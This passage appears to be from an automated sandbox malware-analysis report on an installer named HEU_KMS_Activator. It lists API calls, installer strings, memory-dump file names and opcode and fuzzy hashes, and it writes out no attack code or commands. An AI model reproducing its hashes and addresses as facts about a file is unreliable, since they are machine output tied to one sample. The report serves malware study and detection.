    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSendlstrlen$CloseHandleObjectProcessSingleWait$CodeCreateExitTextWindowlstrcatwvsprintf
    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
    • API String ID: 2917186638-3433828417
    • Opcode ID: e14845f73985f49797aa2f0caa93f007687884ea93ed5360e046f760b186633f
    • Instruction ID: d1dd84156d487da42daeb500d6d6ce361429f128ce4fd5497bfb2c4449ad6cad
    • Opcode Fuzzy Hash: e14845f73985f49797aa2f0caa93f007687884ea93ed5360e046f760b186633f
    • Instruction Fuzzy Hash: D7119D32904215BBDF21AB94DE05AAE7A65EF40314F24003FF601B50E0DBBD4981AB9D

    Control-flow Graph
    APIs
    • SetFilePointer.KERNELBASE(00408A00,00000000,00000000,00000000,00000000,?,?,?,004036BE,000000FF,00000000,00000000,00408A00,?), ref: 0040336D
    • ReadFile.KERNELBASE(00408A00,00000004,?,00000000,00000000,00000004,00000000,00000000,?,?,?,004036BE,000000FF,00000000,00000000,00408A00), ref: 0040339B
    • ReadFile.KERNEL32(004249A0,00004000,?,00000000,00408A00,?,004036BE,000000FF,00000000,00000000,00408A00,?), ref: 004033F5
    • WriteFile.KERNELBASE(00000000,004249A0,?,000000FF,00000000,?,004036BE,000000FF,00000000,00000000,00408A00,?), ref: 0040340D
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$Read$PointerWrite
    • String ID:
    • API String ID: 2113905535-0
    • Opcode ID: 91c605e64ca6659561e8135185ec2416fc68f3a462b2b945c87f04a878783011
    • Instruction ID: bceff78395468939dd0c808d1ec6cdd6c42f3223bff59829e1ecdaa152765343
    • Opcode Fuzzy Hash: 91c605e64ca6659561e8135185ec2416fc68f3a462b2b945c87f04a878783011
    • Instruction Fuzzy Hash: 81310C71500209FBDB11DFA9DD8499E3BBCEB84762F10403AF905EA190D7349B51DF6A

    Control-flow Graph (function at 4031c9; rendered graph and Executed/Not Executed legend omitted)
    APIs
    • GetTickCount.KERNEL32 ref: 004031DE
      • Part of subcall function 004031B2: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403697,?), ref: 004031C0
    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,0040337C,00000004,00000000,00000000,?,?,?,004036BE,000000FF,00000000,00000000), ref: 00403211
    • WriteFile.KERNELBASE(0041C998,00420A11,000000FF,00000000,004249A0,00004000,?,00000000,?,0040337C,00000004,00000000,00000000,?,?), ref: 004032CF
    • SetFilePointer.KERNELBASE(0084DB7B,00000000,00000000,004249A0,00004000,?,00000000,?,0040337C,00000004,00000000,00000000,?,?,?,004036BE), ref: 00403321
    Similarity
    • API ID: File$Pointer$CountTickWrite
    • String ID:
    • API String ID: 2146148272-0
    • Opcode ID: 1828cd59170ff397b45349681c56fe4c1c6fcc5d3fa48b0b92589d578537bf09
    • Instruction ID: b2f8ff4e9b6a80f0a30b6d88c005429b3a8c67ad6538c0199de23a3900fa6ebd
    • Opcode Fuzzy Hash: 1828cd59170ff397b45349681c56fe4c1c6fcc5d3fa48b0b92589d578537bf09
    • Instruction Fuzzy Hash: 6A4180B26122009FD7209FA9EDC496A7BACFB44356754813FE941B32B0CB3459828B5E

    Control-flow Graph (function at 406014; rendered graph and Executed/Not Executed legend omitted)
    APIs
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
      • Part of subcall function 00405AA0: CharNextA.USER32(?,?,0043AA38,00000000,0040602B,0043AA38,0043AA38,d@,?,771B2EE0,004064EE,?,00471000), ref: 00405AAE
      • Part of subcall function 00405AA0: CharNextA.USER32(00000000), ref: 00405AB3
      • Part of subcall function 00405AA0: CharNextA.USER32(00000000), ref: 00405AC2
    • lstrlenA.KERNEL32(0043AA38,00000000,00000000,0043AA38,0043AA38,d@,?,771B2EE0,004064EE,?,00471000), ref: 0040606F
    • GetFileAttributesA.KERNELBASE(0043AA38,0043AA38), ref: 0040607C
    Similarity
    • API ID: CharNext$AttributesFilelstrcpynlstrlen
    • String ID: d@
    • API String ID: 3248276644-2474408879
    • Opcode ID: bcaf0d7691cdc3a64df73085a074f8145fec66e6bfd537306c1045531c4ed0e0
    • Instruction ID: a77b1e27f4d1faccd58aab586ddd3e221e070ef2bbe63c49fb8443b9dbb1e7db
    • Opcode Fuzzy Hash: bcaf0d7691cdc3a64df73085a074f8145fec66e6bfd537306c1045531c4ed0e0
    • Instruction Fuzzy Hash: 24019932189E212AC232E7391D44A9F16488E4732031B013FF883B22C2DF3C8863D47D

    Control-flow Graph (function at 405b60; rendered graph and Executed/Not Executed legend omitted)
    APIs
    • GetTickCount.KERNEL32 ref: 00405B73
    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405B8D
    Similarity
    • API ID: CountFileNameTempTick
    • String ID: nsa
    • API String ID: 1716503409-2209301699
    • Opcode ID: a348680a837ea999b075ed4ef4356b5aef79b087ea15add63ab907e66e05d6f0
    • Instruction ID: 1c5c580aea003068fec851850bf601215df114f532dbf697d95cc27281a0d744
    • Opcode Fuzzy Hash: a348680a837ea999b075ed4ef4356b5aef79b087ea15add63ab907e66e05d6f0
    • Instruction Fuzzy Hash: 24F02732304608B7DB108E19DC04BCB3F6DEF81760F04C02BFA48DE180C6B0A54887A8

    Control-flow Graph (function at 40599a; rendered graph and Executed/Not Executed legend omitted)
    APIs
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0043A9F0,Error launching installer), ref: 004059BF
    • CloseHandle.KERNEL32(?), ref: 004059CC
    Strings
    • Error launching installer, xrefs: 004059A3
    Similarity
    • API ID: CloseCreateHandleProcess
    • String ID: Error launching installer
    • API String ID: 3712363035-66219284
    • Opcode ID: 6c7a91aee1a4036bac63fdeca69de76944c5f85f0703b9806011348b8f00e617
    • Instruction ID: 6241f6bbb51e443f6774ee81d471fc13e6e7e102c01ef3b2fb3be9e778194d77
    • Opcode Fuzzy Hash: 6c7a91aee1a4036bac63fdeca69de76944c5f85f0703b9806011348b8f00e617
    • Instruction Fuzzy Hash: 3FE0ECB1500209ABEB009B64DD09E7B7BBCFB04305F028926A951F2150E774D8148AA9
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d13314cf579c055acdd9b40a44d41c686428c469462516e78ca20b73e45bcba1
    • Instruction ID: 266b5070f8f2f8198caed7b896c680d4be930a4649085d9ae75a31da77d815f9
    • Opcode Fuzzy Hash: d13314cf579c055acdd9b40a44d41c686428c469462516e78ca20b73e45bcba1
    • Instruction Fuzzy Hash: A9A15571904248EBDF18CF29C8946E93BB1FF44355F11812AFC5AAB281D738E985CF89
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 343e0a7b9e8e49579bcbe0d762fb74f202d8048176bc0b459f53e81f01b2feea
    • Instruction ID: 128c248792c808fd345d21b212874807cbb34a3c6489e1ba71df23d81ab00ab8
    • Opcode Fuzzy Hash: 343e0a7b9e8e49579bcbe0d762fb74f202d8048176bc0b459f53e81f01b2feea
    • Instruction Fuzzy Hash: E7914471904248EBDF18CF19C8947A93BB1FF44355F11812AFC5AAB291C778E985CF89
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d61f4907ba9eba15e7b927b050d35d28d963894a733207ae1bec07345276297f
    • Instruction ID: a1428bf5e934a8da67950cb1a4e31238322b9b623b650a7710aa00f8669217ce
    • Opcode Fuzzy Hash: d61f4907ba9eba15e7b927b050d35d28d963894a733207ae1bec07345276297f
    • Instruction Fuzzy Hash: C3816772904218DBDB14CF29C8846AA3BB1FF44355F11812AFC66AB3D0D378E985CF85
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a13d0d67498c19a5f7f37731d51fa10f7b052ae4d415230544ebf08ec861a897
    • Instruction ID: a345c45b08a0fe712b4b444981b17a00aae7dbab26e66ce766d38a34347c3127
    • Opcode Fuzzy Hash: a13d0d67498c19a5f7f37731d51fa10f7b052ae4d415230544ebf08ec861a897
    • Instruction Fuzzy Hash: 86712471904258EBDF18CF29C884AA93BF1FF44355F01812AFC5AAB291D738E995CF85
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8864c4038bf38bdcbc954424f0f4faadc715d4c3dfbb4a637c10816bfd285254
    • Instruction ID: f3230299e38bd29f56d0ffbeda8c1bde680258bd2a591bb66208cfe3900aca32
    • Opcode Fuzzy Hash: 8864c4038bf38bdcbc954424f0f4faadc715d4c3dfbb4a637c10816bfd285254
    • Instruction Fuzzy Hash: D2614571904248EBDF18CF19C884BA93BB1FF44355F01812AFC5AAB291D778E995CF89
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4ceb206248e36403dfca79eb3e1201f06656b7f5723e6cd1c1c3030782f8ac7f
    • Instruction ID: 55e1340be9379fbc86d38aa360a0ddc275db8ce0b4a2ff254698a86f8e959d89
    • Opcode Fuzzy Hash: 4ceb206248e36403dfca79eb3e1201f06656b7f5723e6cd1c1c3030782f8ac7f
    • Instruction Fuzzy Hash: 9B615772904258EBDF18CF29C884BAD3BB1FF44345F01812AFC56AA291D778E995CF85
    APIs
    • GlobalFree.KERNEL32(?), ref: 00406840
    • GlobalAlloc.KERNELBASE(00000040,?,00000000,00004000,004249A0), ref: 00406849
    • GlobalFree.KERNEL32(?), ref: 004068B5
    • GlobalAlloc.KERNELBASE(00000040,?,00000000,00004000,004249A0), ref: 004068C0
    Similarity
    • API ID: Global$AllocFree
    • String ID:
    • API String ID: 3394109436-0
    • Opcode ID: 7f69f18705fb3a2f39afda43d3a9292cde667315888cb2fa2f888119fb812c3b
    • Instruction ID: d37ed04ea5c597886ead4a07dc81eb151e339e51397faf41460444084f42fc09
    • Opcode Fuzzy Hash: 7f69f18705fb3a2f39afda43d3a9292cde667315888cb2fa2f888119fb812c3b
    • Instruction Fuzzy Hash: 84514771904258EBDF18CF29C894BA93BB1FF44355F01812AFC5AAA291D738E985CF84
    APIs
    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013EA
    • SendMessageA.USER32(?,00000402,00000000), ref: 004013FA
    Similarity
    • API ID: MessageSend
    • String ID:
    • API String ID: 3850602802-0
    • Opcode ID: d51c94218ee7f6cc50f0b0ce82fda2cfc591bf51415a861e99cb1909a96aac28
    • Instruction ID: b8f878912a4209ab631adbb221dfc4034d5285355c5802a3b4c1a13922bb6b73
    • Opcode Fuzzy Hash: d51c94218ee7f6cc50f0b0ce82fda2cfc591bf51415a861e99cb1909a96aac28
    • Instruction Fuzzy Hash: 0B01F4716242209FD7156B659D05B2B36D8B752B56F10863AF851F72F1DA38CC038B4D
    APIs
    • FreeLibrary.KERNELBASE(?,00471000,00000000,771B2EE0,00403775,00000000,0040397F,00000000), ref: 00403B43
    • GlobalFree.KERNEL32(?), ref: 00403B4A
    Similarity
    • API ID: Free$GlobalLibrary
    • String ID:
    • API String ID: 1100898210-0
    • Opcode ID: 7cd3cbd90dded5adf5b4d4440ad2bd2206e7973706f2fe713435f7def5422e2d
    • Instruction ID: 72e48957c01ae18c582f5f4d71976f5bc3e4f249d4ce76183a0a155b01fe1031
    • Opcode Fuzzy Hash: 7cd3cbd90dded5adf5b4d4440ad2bd2206e7973706f2fe713435f7def5422e2d
    • Instruction Fuzzy Hash: 39E08C3250113097C7319F02ED08B5A7B38BF44B26F06083AE8803B2618774AC828AD8
    APIs
    • GetFileAttributesA.KERNELBASE(00000003,004034B5,0047F000,80000000,00000003), ref: 00405B35
    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B57
    Similarity
    • API ID: File$AttributesCreate
    • String ID:
    • API String ID: 415043291-0
    • Opcode ID: 0f3402b6cba962e600cc56c330d8d9fefde8de0d508e0e8224f90466c050da7d
    • Instruction ID: c3e69a66c24273800f0284da14eac39fdb4bb69a611d89429022af49fc3b332c
    • Opcode Fuzzy Hash: 0f3402b6cba962e600cc56c330d8d9fefde8de0d508e0e8224f90466c050da7d
    • Instruction Fuzzy Hash: 16D09E31654301AFEF099F20DE1AF6E7AA2EB84B01F11453CB686940E0DAB15819DB15
    APIs
    • GetFileAttributesA.KERNELBASE(?,004066AE,?,?,?), ref: 00405B15
    • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B28
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: a326361d040fe4be9578641be90990488e2144e786cb8665bf2e1c44df0f25fc
    • Instruction ID: 0c7875c7a6039a0948a2cd5e7fcebdd01092d5647bdc414ae539418cebfebeca
    • Opcode Fuzzy Hash: a326361d040fe4be9578641be90990488e2144e786cb8665bf2e1c44df0f25fc
    • Instruction Fuzzy Hash: DAC04CB1404905ABDA015B35EF0D82B7A66EF91331B168739F5BAE00F0CB359CA9DA1D
    APIs
    • CloseHandle.KERNEL32(FFFFFFFF,00000000,0040397F,00000000), ref: 00403753
    • CloseHandle.KERNEL32(FFFFFFFF,00000000,0040397F,00000000), ref: 00403767
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: a89e19a7be5a7c5c93e4bba23131e7c034ee9852e65323cb2780d4280781d09f
    • Instruction ID: a7f848d1a215aff991e9bd86a8b3b0d61f4e706e981be1bc374a0f0dd81f6597
    • Opcode Fuzzy Hash: a89e19a7be5a7c5c93e4bba23131e7c034ee9852e65323cb2780d4280781d09f
    • Instruction Fuzzy Hash: FDE0CDB080031466C134BF3CAE49A853B1C6F41336B118726F175F31F0C77C699146AE
    APIs
    • ReadFile.KERNELBASE(00408A00,00000000,00000000,00000000,004249A0,0041C998,0040324A,004249A0,00004000,?,00000000,?,0040337C,00000004,00000000,00000000), ref: 00403197
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FileRead
    • String ID:
    • API String ID: 2738559852-0
    • Opcode ID: ea88c8a7f1d3987fc34366b1a594ca7d727526782454e813d30f81c20562aa3f
    • Instruction ID: ec576e452d3b6b3ac4c648248f63154295554f3065fc446e17e0cb1c8cccb675
    • Opcode Fuzzy Hash: ea88c8a7f1d3987fc34366b1a594ca7d727526782454e813d30f81c20562aa3f
    • Instruction Fuzzy Hash: 6AE08C32114118BBEB109EA19C00EEB3B6CEB093A2F00C032FA54E9190D638DA20DBE5
    APIs
      • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D3C
      • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D49
      • Part of subcall function 00405CE3: CharNextA.USER32(?,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D4E
      • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D5E
    • CreateDirectoryA.KERNELBASE(0047B000,00000000,0047B000,0047B000,0047B000,00000000,004038CD), ref: 0040372E
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Char$Next$CreateDirectoryPrev
    • String ID:
    • API String ID: 4115351271-0
    • Opcode ID: 858954e3de4b2f387c3bf652934258a7aca60f9a58578df101b6c0c7d6d76c58
    • Instruction ID: 9c78452db516f5a0e4190c37ba41739f4022116687cb74d30a07a911de451cc8
    • Opcode Fuzzy Hash: 858954e3de4b2f387c3bf652934258a7aca60f9a58578df101b6c0c7d6d76c58
    • Instruction Fuzzy Hash: BDD0A721506E3C31C51132263D06FCF142CDF02719B16803BF404710C15B3C2A4348FD
    APIs
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403697,?), ref: 004031C0
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FilePointer
    • String ID:
    • API String ID: 973152223-0
    • Opcode ID: 11901702bfef1b65c53f91a2b0fa746f63f4eb23d8403f080bab23f40303c9ba
    • Instruction ID: 46a7601c07ffc01ef15a4397163cdfcda81e6631882bf63a0e0e8ad13fee7cd4
    • Opcode Fuzzy Hash: 11901702bfef1b65c53f91a2b0fa746f63f4eb23d8403f080bab23f40303c9ba
    • Instruction Fuzzy Hash: F5B01231150300BFDA214F00DF09F057B61BB94700F208434B3D0380F086711030EB0D
    APIs
    • GetDlgItem.USER32(?,00000403), ref: 00404EC7
    • GetDlgItem.USER32(?,000003EE), ref: 00404ED6
    • GetClientRect.USER32(?,?), ref: 00404F2E
    • GetSystemMetrics.USER32(00000015), ref: 00404F36
    • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F57
    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F68
    • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F7B
    • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404F89
    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404F9C
    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FBE
    • ShowWindow.USER32(?,00000008), ref: 00404FD2
    • GetDlgItem.USER32(?,000003EC), ref: 00404FF3
    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405003
    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405018
    • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405024
    • GetDlgItem.USER32(?,000003F8), ref: 00404EE5
      • Part of subcall function 00403C3E: SendMessageA.USER32(00000028,?,00000001,0040553E), ref: 00403C4C
      • Part of subcall function 004060EC: GetVersion.KERNEL32(0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004061A3
      • Part of subcall function 004060EC: lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    • GetDlgItem.USER32(?,000003EC), ref: 00405043
    • CreateThread.KERNEL32(00000000,00000000,Function_00004DE2,00000000), ref: 00405051
    • CloseHandle.KERNEL32(00000000), ref: 00405058
    • ShowWindow.USER32(00000000), ref: 0040507C
    • ShowWindow.USER32(?,00000008), ref: 00405081
    • ShowWindow.USER32(00000008), ref: 004050C8
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050FA
    • CreatePopupMenu.USER32 ref: 0040510B
    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405120
    • GetWindowRect.USER32(?,?), ref: 00405133
    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405157
    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405192
    • OpenClipboard.USER32(00000000), ref: 004051A2
    • EmptyClipboard.USER32 ref: 004051A8
    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051B1
    • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051BB
    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051CF
    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
    • SetClipboardData.USER32(00000001,00000000), ref: 004051F2
    • CloseClipboard.USER32 ref: 004051F8
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrcatlstrlenwvsprintf
    • String ID: New install of "%s" to "%s"${
    • API String ID: 672593662-1641061399
    • Opcode ID: 601142e147a0066dd3d69614aa6d8a70f662e3876f94f1329b31ffa4abc89d46
    • Instruction ID: 032d9592572399d254cc6fc43e6c7c03cb36b4908d517deda48261c0418abfdf
    • Opcode Fuzzy Hash: 601142e147a0066dd3d69614aa6d8a70f662e3876f94f1329b31ffa4abc89d46
    • Instruction Fuzzy Hash: 8CB17B71800208BFDB11AF61DD85EAE7FB9FB45354F10813AFA44BA1A0CB794A41DF58
    APIs
    • GetDlgItem.USER32(?,000003F9), ref: 00404738
    • GetDlgItem.USER32(?,00000408), ref: 00404745
    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404794
    • LoadBitmapA.USER32(0000006E), ref: 004047A7
    • SetWindowLongA.USER32(?,000000FC,Function_00004671), ref: 004047C1
    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004047D3
    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004047E7
    • SendMessageA.USER32(?,00001109,00000002), ref: 004047FD
    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404809
    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404819
    • DeleteObject.GDI32(?), ref: 0040481E
    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404849
    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404855
    • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048F5
    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404918
    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404929
    • GetWindowLongA.USER32(?,000000F0), ref: 00404953
    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404962
    • ShowWindow.USER32(?,00000005), ref: 00404973
    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A70
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404AC8
    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404ADD
    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B01
    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B27
    • ImageList_Destroy.COMCTL32(?), ref: 00404B3C
    • GlobalFree.KERNEL32(?), ref: 00404B4C
    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404BBC
    • SendMessageA.USER32(?,00001102,?,?), ref: 00404C69
    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C78
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C98
    • ShowWindow.USER32(?,00000000), ref: 00404CE7
    • GetDlgItem.USER32(?,000003FE), ref: 00404CF2
    • ShowWindow.USER32(00000000), ref: 00404CF9
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
    • String ID: $M$N
    • API String ID: 1638840714-813528018
    • Opcode ID: 7af6d020ed8754d060b0ff212d44134fc9ef58dd2d277f63f0a015343a46a201
    • Instruction ID: 82c7ba666a3c9d6b89a2c8c45721f0fc7104738e8b179a08c0a637a72377ac6d
    • Opcode Fuzzy Hash: 7af6d020ed8754d060b0ff212d44134fc9ef58dd2d277f63f0a015343a46a201
    • Instruction Fuzzy Hash: 83027EB0A00209AFEF109FA5CD45AAE7BB5FB84314F10853AF611B62E0D7789D91DF58
    APIs
    • GetDlgItem.USER32(?,000003F0), ref: 004042AE
    • IsDlgButtonChecked.USER32(?,000003F0), ref: 004042BC
